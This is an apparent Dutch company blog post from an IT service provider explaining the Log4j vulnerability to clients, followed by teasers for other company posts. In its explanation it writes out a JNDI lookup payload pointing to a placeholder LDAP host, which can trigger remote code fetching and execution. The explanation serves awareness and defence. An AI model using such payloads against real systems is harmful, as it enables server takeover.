Log4j beveiligingslek

Waarschijnlijk heeft u in de media afgelopen weken wel het één en ander voorbij zien komen. Er is een kritieke kwetsbaarheid gevonden in wereldwijd gebruikte software waar u waarschijnlijk nog nooit van gehoord heeft Log4j. Daarom eerst wat uitleg;

Log4j is in een gigantische hoeveelheid platformen, apps en diensten verwerkt. Software van Cisco, IBM, VMware, Fortinet en Red Hat zijn enkele voorbeelden. De precieze toepassing van de library verschilt, maar de registratie van gebeurtenissen in applicaties speelt altijd een rol. Denk aan het noteren van inlogpogingen of de identiteit van de gebruiker van een applicatie.

De applicatie verwerkt een gebeurtenis; Log4j draait data uit. De programmeur van de applicatie bepaalt welke data. Dat kan zoals eerdergenoemd de gebruikersnaam van een gepoogde inlog zijn. Of de tijd waarop een gebruiker inlogt.

De kwetsbaarheid waarop Alibaba’s securityteam stuitte (zij hebben het ontdekt) komt voort uit een wisselwerking tussen programmeertaal Java en library Log4j. Java is in combinatie met Log4j in staat om code in een server op afstand uit te voeren. Daarvoor geven programmeurs de volgende regel mee: ${jndi:ldap://voorbeeld.com/vaneenurl}. De daadwerkelijke url is vervangbaar met het adres van een server naar keuze. Voer je de regel in een Java-applicatie uit, dan probeert de applicatie de data van de gespecificeerde url uit te voeren.

Dit is geen kwetsbaarheid op zich, want in een wenselijk praktijkscenario’s heeft alleen een gemachtigde administrator de mogelijkheid om de regel in een applicatie toe te voegen. Het probleem begint bij Log4j. Draait Log4j de regel uit, dan interpreteert Java precies dezelfde opdracht als een regel die doelgericht door een ontwikkelaar in de applicatie is geplaatst.

Stel dat Log4j is ingesteld om de inhoud van een chatbericht op een online spel te loggen. Een gebruiker van het spel verstuurt de bovengenoemde regel in een chatbericht. De url verwijst naar een server met instructies voor de uitvoering van een malware-applicatie. Log4j draait de regel uit. Java interpreteert een opdracht – en volgt de opdracht netjes op. De gebruiker slaagt in het hacken van de server, zonder ook maar een enkel wachtwoord te hoeven bemachtigen.

Ook heeft het Nationaal Cyber Security Centrum (NCSC) waarschuwt  (onderdeel van het ministerie van Justitie en Veiligheid) dat de computersystemen van bijna alle bedrijven en instellingen mogelijk geraakt kunnen worden. Natuurlijk hebben wij hier direct actie op ondernomen.

Wij zijn voor onze klanten, waarvan wij actief hun ICT omgeving beheren, de afgelopen weken heel druk bezig geweest met het in kaart brengen van de problematieken en het inventariseren van mogelijke risico’s. In gevallen waar de betreffende kwetsbaarheid mogelijk (vroeg of laat) van toepassing kan zijn, hebben wij in overleg en afstemming met applicatieleveranciers en softwareleveranciers, de benodigde maatregelen getroffen om dit Log4J lek te dichten. Ook heeft onze monitoring een extra update gekregen welke scant op het kunnen misbruiken van het Log4j beveiligingslek en zijn onze managed firewalls uitgerust met de juiste update definities om een dergelijke aanval te detecteren en blokkeren.

Uiteraard blijft het zaak in de huidige wereld, met toenemende cyber-dreiging, om scherp te blijven en zorg te dragen voor juiste beveiligingsmaatregelen, bewustzijn bij personeel en actief beheer van uw ICT omgeving. Twijfelt u of Log4j binnen uw omgeving voor schade kan zorgen of bent u benieuwd naar welke maatregelen er te nemen zijn om ‘de beveiligingsdrempel’ hoger te leggen, dan kunt u natuurlijk (#superlogisch) een beroep doen op Analyst ICT.

Laatste blogs

Dutch Cybersecurity Assembly
Nieuws
Analyst ICT en de Dutch Cybersecurity Assembly
Bij Analyst ICT begrijpen we dat de wereld van cybersecurity voortdurend verandert en steeds complexer wordt. Om onze klanten de meest geavanceerde bescherming te bieden, hebben we ons onlangs aangesloten bij de Dutch Cybersecurity Assembly (DCA). Deze samenwerking versterkt onze inzet om voorop te lopen in de bescherming tegen cyberdreigingen en om onze klanten te voorzien van de nieuwste beveiligingsstrategieën en -technologieën. Wat is de Dutch Cybersecurity Assembly? De Dutch Cybersecurity Assembly is een toonaangevende organisatie die zich richt op het verbeteren van de cybersecurityinfrastructuur en -bewustzijn in Nederland. De DCA brengt experts uit de industrie, academische wereld, en overheid…
im 362526
Blog
Wat is SentinelOne?
In de hedendaagse digitale wereld is het van cruciaal belang om de beveiliging van uw bedrijfsgegevens en systemen serieus te nemen. Bij Analyst ICT begrijpen we het belang van geavanceerde cybersecurity-oplossingen en daarom zijn we trots om SentinelOne aan te bevelen en te implementeren voor onze klanten. Hoewel sommigen de naam SentinelOne misschien herkennen van de Formule 1-sponsoring, biedt deze technologie veel meer dan alleen naamsbekendheid. Wat is SentinelOne? SentinelOne is een toonaangevende endpoint security-oplossing, ontworpen om organisaties te beschermen tegen een breed spectrum aan cyberdreigingen. In tegenstelling tot traditionele antivirusprogramma’s, die vaak alleen bekende virussen en malware detecteren, maakt…
certificering
Nieuws
Analyst ICT behaalt ISO 9001, ISO 27001 en NEN 7510 Certificeringen
Maart was een mijlpaalmaand voor Analyst ICT. Met grote trots kondigen we aan dat we officieel gecertificeerd zijn voor ISO 9001, ISO 27001 en NEN 7510. Deze erkenningen zijn niet alleen een bewijs van onze voortdurende inzet voor kwaliteit, beveiliging en betrouwbaarheid, maar benadrukken ook onze toewijding aan het leveren van uitzonderlijke diensten aan onze klanten. Voor ons een superlogische stap. ISO 9001 is de internationaal erkende standaard voor kwaliteitsmanagementsystemen (QMS). Het certificaat bevestigt dat Analyst ICT zich houdt aan de best practices voor het leveren van consistent hoge kwaliteit in dienstverlening, met een sterke focus op klanttevredenheid en een…

Een nieuwsbrief

Superlogisch toch?